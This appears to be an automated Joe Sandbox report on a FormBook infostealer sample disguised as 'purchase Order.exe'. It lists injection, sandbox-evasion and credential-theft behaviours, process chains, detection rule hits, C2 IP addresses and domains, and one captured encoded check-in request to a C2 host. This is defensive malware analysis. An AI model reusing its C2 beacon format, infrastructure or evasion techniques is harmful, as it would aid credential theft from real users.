Edit tour

Windows Analysis Report
purchase Order.exe

Overview

General Information

Sample name:	purchase Order.exe
Analysis ID:	1561730
MD5:	e46648bd205f6e9908880c73a9cb2847
SHA1:	478c6f62acfbf5e91d5cfa6fb7511816be5cce57
SHA256:	b67a3251ab0a9126e283677b065a75f6463e4cd0becc96f1a78dce212cce4b2e
Tags:	exeuser-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Suspicious Process Parents

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

purchase Order.exe (PID: 4068 cmdline: "C:\Users\user\Desktop\purchase Order.exe" MD5: E46648BD205F6E9908880C73A9CB2847)

svchost.exe (PID: 5760 cmdline: "C:\Users\user\Desktop\purchase Order.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

McqlvggSSSjC.exe (PID: 6216 cmdline: "C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

bitsadmin.exe (PID: 6240 cmdline: "C:\Windows\SysWOW64\bitsadmin.exe" MD5: F57A03FA0E654B393BB078D1C60695F3)

McqlvggSSSjC.exe (PID: 1980 cmdline: "C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 2376 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.3220556041.0000000000C00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3221831734.00000000030C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3223837018.0000000005850000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1621550666.00000000036A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1621140733.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3221901716.0000000003110000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3222030300.0000000002E50000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1622264740.0000000004800000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Process Parents

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe" , CommandLine: "C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe, NewProcessName: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe, OriginalFileName: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe, ParentCommandLine: "C:\Windows\SysWOW64\bitsadmin.exe", ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 6240, ParentProcessName: bitsadmin.exe, ProcessCommandLine: "C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe" , ProcessId: 1980, ProcessName: McqlvggSSSjC.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\purchase Order.exe", CommandLine: "C:\Users\user\Desktop\purchase Order.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase Order.exe", ParentImage: C:\Users\user\Desktop\purchase Order.exe, ParentProcessId: 4068, ParentProcessName: purchase Order.exe, ProcessCommandLine: "C:\Users\user\Desktop\purchase Order.exe", ProcessId: 5760, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\purchase Order.exe", CommandLine: "C:\Users\user\Desktop\purchase Order.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase Order.exe", ParentImage: C:\Users\user\Desktop\purchase Order.exe, ParentProcessId: 4068, ParentProcessName: purchase Order.exe, ProcessCommandLine: "C:\Users\user\Desktop\purchase Order.exe", ProcessId: 5760, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T08:13:05.360687+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.9	49803	161.97.168.245	80	TCP
2024-11-24T08:13:31.110419+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.9	49863	27.124.4.246	80	TCP
2024-11-24T08:14:07.393960+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.9	49902	149.88.81.190	80	TCP
2024-11-24T08:14:23.128933+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.9	49986	85.159.66.93	80	TCP
2024-11-24T08:14:38.188508+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.9	49990	185.27.134.144	80	TCP
2024-11-24T08:14:53.273537+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.9	49994	172.67.145.234	80	TCP
2024-11-24T08:15:08.316038+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.9	49998	172.67.167.146	80	TCP
2024-11-24T08:15:23.516537+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.9	50002	154.88.22.110	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T08:13:05.360687+0100	2855465	1	A Network Trojan was detected	192.168.2.9	49803	161.97.168.245	80	TCP
2024-11-24T08:13:31.110419+0100	2855465	1	A Network Trojan was detected	192.168.2.9	49863	27.124.4.246	80	TCP
2024-11-24T08:14:07.393960+0100	2855465	1	A Network Trojan was detected	192.168.2.9	49902	149.88.81.190	80	TCP
2024-11-24T08:14:23.128933+0100	2855465	1	A Network Trojan was detected	192.168.2.9	49986	85.159.66.93	80	TCP
2024-11-24T08:14:38.188508+0100	2855465	1	A Network Trojan was detected	192.168.2.9	49990	185.27.134.144	80	TCP
2024-11-24T08:14:53.273537+0100	2855465	1	A Network Trojan was detected	192.168.2.9	49994	172.67.145.234	80	TCP
2024-11-24T08:15:08.316038+0100	2855465	1	A Network Trojan was detected	192.168.2.9	49998	172.67.167.146	80	TCP
2024-11-24T08:15:23.516537+0100	2855465	1	A Network Trojan was detected	192.168.2.9	50002	154.88.22.110	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-24T08:13:23.188575+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49845	27.124.4.246	80	TCP
2024-11-24T08:13:25.829233+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49851	27.124.4.246	80	TCP
2024-11-24T08:13:28.485540+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49857	27.124.4.246	80	TCP
2024-11-24T08:13:38.954469+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49883	149.88.81.190	80	TCP
2024-11-24T08:13:41.626315+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49889	149.88.81.190	80	TCP
2024-11-24T08:13:44.298121+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49895	149.88.81.190	80	TCP
2024-11-24T08:14:15.220013+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49967	85.159.66.93	80	TCP
2024-11-24T08:14:17.891846+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49973	85.159.66.93	80	TCP
2024-11-24T08:14:20.563785+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49979	85.159.66.93	80	TCP
2024-11-24T08:14:30.104854+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49987	185.27.134.144	80	TCP
2024-11-24T08:14:32.766640+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49988	185.27.134.144	80	TCP
2024-11-24T08:14:35.517068+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49989	185.27.134.144	80	TCP
2024-11-24T08:14:45.532572+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49991	172.67.145.234	80	TCP
2024-11-24T08:14:47.949610+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49992	172.67.145.234	80	TCP
2024-11-24T08:14:50.602328+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49993	172.67.145.234	80	TCP
2024-11-24T08:15:00.280976+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49995	172.67.167.146	80	TCP
2024-11-24T08:15:02.945910+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49996	172.67.167.146	80	TCP
2024-11-24T08:15:05.598869+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49997	172.67.167.146	80	TCP
2024-11-24T08:15:15.532547+0100	2855464	1	A Network Trojan was detected	192.168.2.9	49999	154.88.22.110	80	TCP
2024-11-24T08:15:18.188878+0100	2855464	1	A Network Trojan was detected	192.168.2.9	50000	154.88.22.110	80	TCP
2024-11-24T08:15:20.860837+0100	2855464	1	A Network Trojan was detected	192.168.2.9	50001	154.88.22.110	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: purchase Order.exe	ReversingLabs: Detection: 57%
Source: purchase Order.exe	Virustotal: Detection: 63%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3220556041.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3221831734.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3223837018.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1621550666.00000000036A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1621140733.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3221901716.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3222030300.0000000002E50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1622264740.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: purchase Order.exe

Joe Sandbox ML: detected

Source: purchase Order.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: bitsadmin.pdb source: svchost.exe, 00000002.00000003.1587669784.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587772591.0000000003048000.00000004.00000020.00020000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3220941177.0000000000558000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000002.00000003.1587669784.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587772591.0000000003048000.00000004.00000020.00020000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3220941177.0000000000558000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: McqlvggSSSjC.exe, 00000004.00000002.3221614821.0000000000D6E000.00000002.00000001.01000000.00000005.sdmp, McqlvggSSSjC.exe, 00000006.00000000.1689659605.0000000000D6E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: purchase Order.exe, 00000000.00000003.1396204625.0000000004110000.00000004.00001000.00020000.00000000.sdmp, purchase Order.exe, 00000000.00000003.1392103666.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1621586541.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1621586541.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523966149.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1525871105.0000000003500000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3222107519.000000000349E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1624599311.000000000314D000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1621215239.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3222107519.0000000003300000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: purchase Order.exe, 00000000.00000003.1396204625.0000000004110000.00000004.00001000.00020000.00000000.sdmp, purchase Order.exe, 00000000.00000003.1392103666.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1621586541.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1621586541.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523966149.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1525871105.0000000003500000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3222107519.000000000349E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1624599311.000000000314D000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1621215239.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3222107519.0000000003300000.00000040.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C86CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00C86CA9
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C860DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_00C860DD
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C863F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_00C863F9
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C8EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C8EB60
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C8F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00C8F5FA
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C8F56F FindFirstFileW,FindClose,	0_2_00C8F56F
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C91B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C91B2F
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C91C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C91C8A
Source: C:\Users\user\Desktop\purchase Order.exe	Code function: 0_2_00C91F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C91F94

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49863 -> 27.124.4.246:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49845 -> 27.124.4.246:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49863 -> 27.124.4.246:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49803 -> 161.97.168.245:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49803 -> 161.97.168.245:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49851 -> 27.124.4.246:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49857 -> 27.124.4.246:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49883 -> 149.88.81.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49889 -> 149.88.81.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49902 -> 149.88.81.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49902 -> 149.88.81.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49967 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49895 -> 149.88.81.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49987 -> 185.27.134.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49979 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49973 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49988 -> 185.27.134.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49999 -> 154.88.22.110:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49997 -> 172.67.167.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49992 -> 172.67.145.234:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49994 -> 172.67.145.234:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49994 -> 172.67.145.234:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:50001 -> 154.88.22.110:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49995 -> 172.67.167.146:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49990 -> 185.27.134.144:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49990 -> 185.27.134.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49993 -> 172.67.145.234:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49998 -> 172.67.167.146:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49998 -> 172.67.167.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49989 -> 185.27.134.144:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:50002 -> 154.88.22.110:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:50002 -> 154.88.22.110:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49996 -> 172.67.167.146:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49991 -> 172.67.145.234:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49986 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49986 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:50000 -> 154.88.22.110:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.soainsaat.xyz
Source:	DNS query: www.soainsaat.xyz
Source:	DNS query: www.amayavp.xyz

Source: Joe Sandbox View

IP Address: 185.27.134.144 185.27.134.144

Source: Joe Sandbox View	ASN Name: SAIC-ASUS SAIC-ASUS
Source: Joe Sandbox View	ASN Name: CNSERVERSUS CNSERVERSUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: WILDCARD-ASWildcardUKLimitedGB WILDCARD-ASWildcardUKLimitedGB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\purchase Order.exe

Code function: 0_2_00C94EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00C94EB5

Source: global traffic	HTTP traffic detected: GET /xxr1/?6vSXrZxp=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM6q1x7MLoHRo8pv4eG/wGdJUiKAzPmFA==&av=Zj6TS2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nb-shenshi.buzzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
